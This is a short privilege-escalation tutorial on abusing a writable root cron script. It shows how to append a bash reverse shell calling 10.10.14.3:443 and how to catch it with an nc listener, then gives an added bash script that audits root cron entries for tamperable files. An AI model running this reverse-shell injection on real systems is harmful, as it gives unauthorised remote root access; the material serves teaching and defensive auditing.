Cron Job Abuse

Sample Exploitation

  1. Use pspy64 to monitor tasks. The -pf flags print commands and file system events. The -i 1000 flag sets the procfs scan interval to 1000 ms.

    $ ./pspy64 -pf -i 1000

  2. View backup.sh

    $ cat /dmz-backups/backup.sh

    #!/bin/bash
    SRCDIR="/var/www/html"
    DESTDIR="/dmz-backups/"
    FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz
    tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR

  3. Edit backup.sh and add a reverse shell at the end

    #!/bin/bash
    SRCDIR="/var/www/html"
    DESTDIR="/dmz-backups/"
    FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz
    tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR
     
    bash -i >& /dev/tcp/10.10.14.3/443 0>&1
  4. Make sure to ready a listener

    $ nc -lnvp 443
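
These steps depend on backup.sh being editable by an account other than the one the scheduled task runs as. The check below for that condition is an added example, not part of the original notes; it assumes GNU coreutils and root-owned cron entries, and the function names are hypothetical.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): audit scripts run by root cron
# entries for the write access that the steps above rely on.
# Assumes GNU coreutils; all function names are hypothetical.

# Print the program run by each root entry in system-crontab text on stdin
# (the /etc/crontab and /etc/cron.d format, which carries a user field).
# Only the first word of each command is reported.
root_cron_commands() {
    awk '/^[ \t]*(#|$)/ { next }
         $1 ~ /^@/ && $2 == "root" { print $3; next }
         NF >= 7 && $6 == "root"   { print $7 }'
}

# tamperable PATH TRUSTED_UID: succeed if PATH cannot be checked, is not owned
# by TRUSTED_UID, or has the group- or other-write bit set.
tamperable() {
    local info mode uid
    info=$(stat -c '%a %u' -- "$1" 2>/dev/null) || return 0
    mode=${info% *}; uid=${info#* }
    [ "$uid" = "$2" ] || return 0
    [ $(( 0$mode & 022 )) -ne 0 ]
}

# audit_cron_script SCRIPT [TRUSTED_UID]: check the script and its directory
# (a writable directory lets the file be replaced). Returns 1 on any finding.
audit_cron_script() {
    local script="$1" trusted="${2:-0}" rc=0 p
    for p in "$script" "$(dirname -- "$script")"; do
        if tamperable "$p" "$trusted"; then
            echo "FINDING: $p fails the owner/mode check (trusted uid $trusted)"
            rc=1
        fi
    done
    return "$rc"
}

# When run directly with a crontab file argument (for example /etc/crontab),
# audit every program that a root entry starts.
if [ "$#" -gt 0 ]; then
    root_cron_commands < "$1" | while read -r cmd; do
        audit_cron_script "$cmd"
    done
fi
```

File ACLs and ancestor directories above the script's own directory are not examined.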
